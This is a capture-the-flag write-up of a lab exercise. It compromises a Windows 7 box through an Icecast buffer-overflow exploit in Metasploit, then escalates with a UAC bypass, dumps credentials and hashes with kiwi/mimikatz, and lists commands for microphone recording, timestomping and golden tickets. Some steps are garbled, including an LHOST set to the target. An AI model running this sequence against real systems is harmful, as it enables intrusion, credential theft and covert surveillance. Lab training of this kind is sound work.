Task 1. Connect
You are now ready to use our machines on our network!
No answer needed
Now when you deploy material, you will see an internal IP address of your Virtual Machine.
No answer needed
Task 2. Recon
Let make a Nmap scan to identify running services
death@esther:~$ nmap 10.10.203.69 -sV -Pn -A --script=vuln -T 4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 09:07 IST
Nmap scan report for 10.10.203.69
Host is up (0.15s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
8000/tcp open http Icecast streaming media server
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 806.12 seconds
According to scan results:
Windows 7 is used.
Microsoft Remote Desktop (MSRDP) is running on port 3389.
HTTP is running on port 8000 with Icecast service.
The Host is DARK-PC.
Task 3. Gain Access
As the IceCast media server is present let search of any vulnerability.
In IceCast server a CVE-2004-1561 is present.
Becouse of buffer overflow it alows an attacker to execute code.
It have 6.4 Impact score.
It can be exploit by metasploit.
Let exploit using Msfconsole.
To open msfconsole type msfconsole on termial.
search for Icecast
This is the exploit exploit/windows/http/icecast_header we were going to use.
For using this expoit type Use 0 on termial.
Let configure this Exploit to gain Shell.
Type show options so knew about required settings.
We only need to set is RHOSTS and Our LHOST the Target Address.
For setting RHOSTS use:
set RHOSTS <Target IP>
set LHOST <Target IP>
So it time to Run Exploit
run
We got the meterpreter Shell
Task 4. Escalate
Let get the user id using command
getuid
Let take a view at system info.
sysinfo
The buid is 7601.
The Architecture is x64.
Let run a post module of recon to get more way to exploit this system.
run post/multi/recon/local_exploit_suggester
The first exploit we got is
exploit/windows/local/bypassuac_eventvwr
oh sry my machine got expired
Now we have an exploit let backgound this session using
ctrl + z
But before running use command back to back from previous exploit
back
So, let run the exploit we found.
use exploit/windows/local/bypassuac_eventvwr
Now let see options this exploit
show options
We need to change the LHOST and Set the Sessions
set LHOST 10.17.120.99
set session 1
run
The exploit ran successfully.
Let check permission listed allows us to take ownership of files?
getprivs
SeTakeOwnershipPrivilege allow us to take ownership.
Task 5. Looting
Let list the process uisng command:
ps
We were going to migrate the process run by admin.
migrate -N spoolsv.exe
After migratre check for uid, as we sucessfully migrated and we are noW NT AUTHORITY.
Let loot the site
load kiwi
Kiwi extensions to perform various types of credential-oriented operations, such as dumping passwords and hashes, dumping passwords in memory, generating golden tickets, and much more.
We can use help command to get help of kiwi.
So first we going to Retrieve all credentials.
creds_all
The password for dark is Password01!.
Task 6. Post-Exploitation
Let dump all the passwords.
hashdump
We can also share the screen of target using
screenshare
We can even record from a microphone attached to the system using command.
record_mic
To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this?
timestomp
Mimikatz allows us to create what's called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?
golden_ticket_create
Thankyou 😄